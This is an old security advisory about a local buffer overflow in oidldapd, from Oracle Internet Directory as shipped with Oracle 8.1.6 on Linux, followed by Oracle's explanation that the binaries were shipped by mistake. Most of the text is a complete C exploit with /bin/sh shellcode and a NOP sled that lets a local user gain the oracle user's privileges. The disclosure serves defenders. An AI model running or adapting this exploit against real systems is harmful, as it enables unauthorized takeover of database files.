Vulnerability

    oidldapd

Affected

    Oracle Internet Directory

Description

    Juan  Manuel  Pascual  found  following  (tested  with oidldapd in
    Oracle 8.1.6).   There is a  buffer overflow in  oidldapd that can
    be use by  local users to  obtain euid of  oracle user.   With the
    default instalation oracle user owns all database files.  Any user
    with local access, can gain euid= oracle.

    /*
    Exploit Code for oidldapd in Oracle 8.1.6 (8ir2) for Linux. I tested
    in RH 6.2 and 6.1. This code is a bullshit (i know please no comments
    about ;-)).

    If someone exports this to Sparc please tell me.

    synopsis: buffer overflow in oidldapd
    impact:	  any user gain euid=oracle.


    Dedicated to PlazaSite guys. Klink Klink Team. Panxeta, Entrophy and others.
    */

    #include <stdio.h>
    #include <stdlib.h>

    #define DEFAULT_OFFSET                   13
    #define DEFAULT_BUFFER_SIZE             700
    #define NOP                            0x90
    #define ORACLE_HOME		"/usr/local/oracle/app/oracle/product/8.1.6"

    char shellcode[] =
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    unsigned long get_sp(void) {
       __asm__("movl %esp,%eax");
    }

    void main(int argc, char *argv[]) {
      char *buff, *ptr,*name[3],environ[100],binary[120];
      long *addr_ptr, addr;
      int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
      int i;


      buff = malloc(bsize);
      addr = get_sp() - offset;
      ptr = buff;
      addr_ptr = (long *) ptr;
      for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;

      for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;

      ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
      for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

      buff[bsize - 1] = '\0';

      memcpy(buff,"EGG=",4);
      putenv(buff);
      sprintf(environ,"ORACLE_HOME=%s",ORACLE_HOME);
      putenv(environ);
      sprintf(binary,"%s/bin/oidldapd connect=$EGG",ORACLE_HOME);
      system(binary);
    }

Solution

    The Linux version of  Oracle Internet Directory (mentioned  in the
    alert)  is  not  a  production  release from Oracle; though Oracle
    Internet  Directory  2.0.6  was  never  released on Linux, the OID
    binaries were accidentally shipped  with the 8.1.6 Linux  port and
    apparently  install  by  default.   Oracle  position  is that this
    should be  regarded as  a "pre  alpha" product,  is not supported,
    and  should  under  no  circumstances  put  into  production  in a
    customer's  environment.   Oracle  apologize  for  our mistake and
    regret and inconvenience this has caused our customers.

    Oracle encourages all Linux  directory developers to download  the
    upcoming production version of Oracle Internet Directory,  v2.1.1,
    part of the Oracle 8.1.7 (8i  Release 3) server  media pack,  from
    http://technet.oracle.com/.